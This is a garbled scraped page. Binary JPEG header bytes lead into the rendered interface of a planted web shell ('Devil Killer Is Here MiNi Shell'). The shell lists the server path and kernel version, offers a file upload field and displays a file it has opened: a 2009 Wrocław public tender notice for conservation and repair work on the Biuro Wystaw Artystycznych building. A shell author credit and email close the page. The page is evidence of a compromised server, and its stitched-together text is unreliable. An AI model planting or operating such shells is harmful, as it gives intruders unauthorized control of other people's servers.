JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090518/153682-N-2009.html

<p class="kh_header"><b>Wrocław: Wykonanie robót budowlanych i konserwatorskich oraz dokumentacji projektowej przebudowy i remontu budynku Biura Wystaw Artystycznych przy ul. Wita Stwosza 32 we Wrocławiu wraz z uzyskaniem zezwoleń konserwatorskich i decyzji o pozwoleniu na budowę.</b><br>
<b>Numer ogłoszenia: 153682 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Inwestycji Miejskich , ul. Januszowicka 15A, 53-135 Wrocław, woj. dolnośląskie, tel. 071 3607356, faks 071 360 73 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zim.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych i konserwatorskich oraz dokumentacji projektowej przebudowy i remontu budynku Biura Wystaw Artystycznych przy ul. Wita Stwosza 32 we Wrocławiu wraz z uzyskaniem zezwoleń konserwatorskich i decyzji o pozwoleniu na budowę..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	PRZEDMIOT ZAMÓWIENIA:
	Przedmiotem zamówienia jest wykonanie robót budowlanych i konserwatorskich oraz dokumentacji projektowej przebudowy i remontu budynku Biura Wystaw Artystycznych przy ul. Wita Stwosza 32 we Wrocławiu wraz z uzyskaniem zezwoleń konserwatorskich i decyzji o pozwoleniu na budowę.
2.	Zaprojektowane i wykonane zostaną roboty budowlane  w następującym zakresie:
2.1.	roboty zewnętrzne:
a)	Odbicie tynku zewnętrznego zawilgoconego lub odspojonego od podłoża a następnie uzupełnienie ubytku tynku na elewacji od strony ulicy Św. Wita;
b)	Odbicie tynku zewnętrznego zawilgoconego lub odspojonego od podłoża a następnie uzupełnienie ubytku tynku na elewacji od strony ul. Krowiej;	
c)	Odbicie tynku zewnętrznego zawilgoconego lub odspojonego od podłoża a następnie uzupełnienie ubytku tynku na elewacji od strony dziedzińca;
d)	Wycinka samosiejek drzew na portyku i drzew od strony dziedzińca zagrażających bezpieczeństwu obiektu oraz redukcja koron drzew;
e)	Wykonanie opaski i wyrównanie terenu przy budynku od strony dziedzińca;
f)	Przemurowanie kominów i naprawa lub wymiana pokrycia dachowego i obróbek blacharskich;
g)	Wykonanie podstawowych zaleceń dotyczących wzmocnienia konstrukcji portyku;
h)	Naprawa uszkodzonego i nieszczelnego pokrycia dachu oraz naprawa odprowadzenia wody z dachu podcienia i balkonu nad portykiem wraz z montażem opierzenia blacharskiego; 
i)	Podcienia - kontrola i ewentualnie wymiana kotew mocujących elementy lapidaryjne, montaż siatki zabezpieczającej przed gniazdowaniem ptaków, oczyszczenie powierzchni tynkowanych ze złuszczających się powłok malarskich i uzupełnienie tynku ścian podcienia wraz z ich malowaniem, wymiana zawilgoconych i odspojonych od podłoża tynków na narożnikach elewacji podcienia.
2.2.	roboty wewnętrzne:
a)	Wykucie i ponowne osadzenie wyżej poręczy dwóch biegów schodowych wewnętrznych;
b)	Oczyszczenie z wykładziny i kleju stopni kamiennych schodów wewnętrznych oraz płomieniowanie granitowych stopnic schodów.
3.	W wyniku zaprojektowania a następnie remontu o charakterze zachowawczym i w ograniczonym zakresie, zostaną wyeliminowane zagrożenia oraz niedogodności wynikające z obecnego niezadowalającego stanu elewacji budynku, wewnętrznych klatek schodowych, pokrycia dachu i stanu obróbek blacharskich oraz odwodnienia części dachu a także fragmentu nawierzchni dziedzińca. 
4.	Zabytkowy budynek będzie zabezpieczony przed destrukcyjnym oddziaływaniem czynników zewnętrznych oraz ulegnie poprawie bezpieczne korzystanie z klatek schodowych. Po wykonaniu prac budowlanych portyku, zostanie on zabezpieczony przed wodami opadowymi i zawilgocone oraz odspojone od podłoża tynki zostaną odbite i wykonane nowe.
5.	W ramach zadania nie zmienia się sposobu użytkowania obiektu i nie wprowadza zmian w układzie funkcjonalnym budynku. 
6.	Szczegółowy zakres przedmiotu zamówienia, założenia programowe, standard wykonania opisano w:
6.1.1.	Załączniku nr 1 do SIWZ- szczegółowy opis przedmiotu zamówienia,
6.1.2.	Załączniku nr 2 do SIWZ- program funkcjonalno - użytkowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9, 71.32.00.00-7, 71.22.00.00-6, 45.45.30.00-7, 45.26.12.10-9, 45.26.13.20-3, 45.41.00.00-4, 45.22.30.00-6, 45.11.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3.500,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
i ponadto:
1.5.	dysponują osobami zdolnymi do realizacji zamówienia, tzn.:
a)	osobami posiadającymi uprawnienia projektowe w zakresie zgodnym z przedmiotem zamówienia w branży architektonicznej, konstrukcyjnej, będącymi członkami właściwych izb samorządu zawodowego i posiadającymi aktualne zaświadczenia o przynależności do izby;
b)	kierownikiem budowy, który posiada uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności architektonicznej lub konstrukcyjno-budowlanej, będącym członkiem właściwej izby samorządu zawodowego i posiadającym aktualne zaświadczenie o przynależności do izby;
Kierownik budowy musi posiadać kwalifikacje zawodowe wymagane § 7 i § 8, z zastrzeżeniem  określonym w § 13, Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004r. nr 150 poz. 1579), tj.: posiadać udokumentowane min. 2-letnie doświadczenie w sprawowaniu funkcji kierownika budowy na obiektach zabytkowych.
1.6.	posiadają niezbędną wiedzą i doświadczenie, tzn.:
a)	w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali zamówienie odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania tj. minimum 1 projekt budowlano-wykonawczy przebudowy lub remontu budynku wpisanego do wykazu lub rejestru zabytków w zakresie robót elewacyjnych i dekarskich. 
b)	w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali zamówienie odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania tj.: minimum 1 zamówienie polegające na przebudowie lub remoncie budynku wpisanego do wykazu lub rejestru zabytków w zakresie robót elewacyjnych i dekarskich.
W/w przedsięwzięcia muszą być wykonane z należytą starannością.
Zamawiający uzna za spełnienie warunków określonych w punktach 1.6 lit. a i 1.6 lit. b za spełniony, zarówno w przypadku, gdy wykonawca wykaże, że wymagany zakres odpowiednio robót elewacyjnych i dekarskich zrealizowano w ramach jednego zamówienia, jak i w ramach dwóch osobnych zamówień, tj. dotyczących różnych inwestycji.
1.7.	są ubezpieczeni od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności.

2.	Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej, wg zasady spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.		Formularz oferty - podpisany na każdej stronie (wzór nr 2.1)	
2.		Dowód wniesienia wadium 	
3.		Pełnomocnictwo
- W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru albo aktualnym zaświadczeniu o wpisie do ewidencji działalności gospodarczej - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy;
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy PZP).
Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej notarialnie.	
4.		Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	
5. Oświadczenie Wykonawcy w sprawie ubiegania się o zamówienie publiczne 
(wzór nr 1.1.).	

UWAGA !!!
W przypadku podmiotów występujących wspólnie dolumenty wymienione w pkt 4 i 5 musi złożyć każdy z podmiotów występujących wspólnie.


6.		Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia - (wzory 1.2 A i 1.2 B).	
7.		Uprawnienia budowlane w/w osób wskazanych do projektowania, pełnienia funkcji kierownika budowy, zgodnie z zakresem przedmiotu zamówienia.	
7a	Dokumenty potwierdzające min. 2-letnie doświadczenie kierownika budowy w zakresie kierowania budowami dotyczącymi budynków zabytkowych.	
8.		Aktualne zaświadczenia z właściwej Izby Samorządu Zawodowego o przynależności do Izby osób pełniących samodzielne funkcje w budownictwie. (j.w.)	
9.		Wykaz wykonanych zamówień (doświadczanie zawodowe) zrealizowanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali zamówienie odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że opracowania zostały wykonane należycie. (wzór 1.3 A)	
10.		Wykaz wykonanych robót budowlanych (doświadczenie zawodowe) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. (wzór 1.3 B)	
11.		Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zim.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, pokój nr 17 lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 10:00, miejsce: siedziba Zamawiającego, Kancelaria (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com